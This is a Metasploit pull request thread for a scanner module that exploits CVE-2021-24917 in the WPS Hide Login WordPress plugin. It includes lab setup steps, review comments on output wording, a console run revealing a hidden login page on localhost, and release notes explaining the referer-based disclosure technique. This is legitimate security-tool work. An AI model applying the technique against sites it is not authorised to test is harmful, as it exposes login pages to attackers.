wps_hide_login module CVE-2021-24917
rapid7/metasploit-framework pull request #15953
Opened 2021-12-11 19:28 UTC by h00die

This module is basically a glorified `curl` command. it should take 10min to test .

## Verification

List the steps needed to make sure this thing works

- [ ] Install the vulnerable plugin and set a new login page
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_wps_hide_login_revealer`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should find the hidden login page
- [ ] **Document** is good

2021-12-13 00:00 UTC, gwillcox-r7 requested changes
Overall looks good, some very minor suggestions for improvement. Nice work :)

2021-12-14 22:56 UTC, gwillcox-r7 commented
> you poked the bull, so enjoy the horns :) you had a good comment about the 'vulnerable version detected'... OF WHAT. So i went ahead and updated EVERY module that had that phrase in it.

XD I suppose I did ask for that XD Will review this now

2021-12-14 23:08 UTC, gwillcox-r7 approved these changes
Ignore these other comments @h00die they are purely for my tracking purposes to ensure I fix them before this gets merged in. I will go ahead and make these changes since you took the time to try and fix what I pointed out.

2021-12-14 23:08 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_learnpress_sqli.rb
> +    print_good('Vulnerable version of Learnpress detected')
```suggestion
    print_good('Vulnerable version of LearnPress detected')
```

2021-12-14 23:08 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
>        fail_with Failure::NotVulnerable, 'Email subscribers and newsletter version not vulnerable'
```suggestion
      fail_with Failure::NotVulnerable, 'Email Subscribers and Newsletter version not vulnerable'
```

2021-12-14 23:08 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
> +    print_good('Vulnerable version of Email subscribers and newsletter detected')
```suggestion
    print_good('Vulnerable version of Email Subscribers and Newsletter detected')
```

2021-12-14 23:08 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb
> +    print_good("#{ip} - Vulnerable version of 'Boldgrid Backup' detected")
```suggestion
    print_good("#{ip} - Vulnerable version of Boldgrid Backup detected")
```

2021-12-14 23:08 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb
> +      fail_with Failure::NotVulnerable, "#{ip} - A vulnerable version of 'Boldgrid Backup' was not found"
```suggestion
      fail_with Failure::NotVulnerable, "#{ip} - A vulnerable version of Boldgrid Backup was not found"
```

2021-12-14 23:08 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_total_upkeep_downloader.md
> +[+] 1.1.1.1 - Vulnerable version of 'Boldgrid Backup' detected
```suggestion
[+] 1.1.1.1 - Vulnerable version of Boldgrid Backup detected
```

2021-12-15 21:43 UTC, h00die commented
appreciated, but thats not how teamwork works. I got it :)

2021-12-15 22:17 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_learnpress_sqli.md
> +[+] Vulnerable version of Learnpress detected
This was corrected but you removed the `n` here. I'll fixed this before landing.

2021-12-15 22:49 UTC, gwillcox-r7 commented
For reference to download and install the plugin:

1. Go to https://downloads.wordpress.org/plugin/wps-hide-login.1.9.zip
2. Log in to WordPress
3. Go to `Plugins`->`Add New` and click `Upload Plugin` and select the downloaded ZIP file.
4. Click `Install Now`
5. Click `Activate Plugin` on the install page confirming the install succeeded.
6. All good, start testing!

Will add these in to readme just so people know how to find the file since it may not be obvious to those not familiar with Wordpress how to obtain older versions of a plugin.

2021-12-15 22:53 UTC, gwillcox-r7 commented
Also to edit plugin settings, go to `/wp-admin/plugins.php`, find the `WPS Hide Login` plugin, click `Settings` and then change `Login URL`.

Alternatively just go to `/wp-admin/options-general.php#whl_settings` and change it there.

2021-12-15 23:12 UTC, gwillcox-r7 commented
Testing completed, looks like it works as expected, will add in some directions for additional info on setting up a test environment and fix the minor typo as part of the PR land but this looks good to go. Landing shortly.

```
msf6 > use auxiliary/scanner/http/wp_wps_hide_login_revealer
msf6 auxiliary(scanner/http/wp_wps_hide_login_revealer) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/wp_wps_hide_login_revealer) > show options

Module options (auxiliary/scanner/http/wp_wps_hide_login_revealer):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                         t:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
                                         7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per ho
                                         st)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_wps_hide_login_revealer) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/wp_wps_hide_login_revealer) > run

[+] 127.0.0.1 - Vulnerable version of wps_hide_login detected
[*] 127.0.0.1 - Determining login page
[+] Login page: http://127.0.0.1:8000/?whatasecretloginpage&redirect_to=%2Fwp-admin%2FD7veG&reauth=1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_wps_hide_login_revealer) > 
```

2021-12-15 23:14 UTC, merged

2021-12-15 23:15 UTC, gwillcox-r7 commented
For reference https://github.com/rapid7/metasploit-framework/commit/ace37bd6780a451981b4632eabe9e2d1bf8eee01 was ninja added to fix up typo and to add a bit more documentation around how to install WordPress and download and configure the plugin just in case it helps anyone.

2021-12-15 23:18 UTC, gwillcox-r7 commented
# Release Notes
A new PR for CVE-2021-24917 was added, which is an information disclosure bug in WPS Hide Login WordPress plugin before 1.9.1. This vulnerability allows unauthenticated users to get the secret login page by setting a random referer string and making a request to `/wp-admin/options.php`. Additionally, several WordPress modules were updated to more descriptively report which plugin they found as being vulnerable on a given target.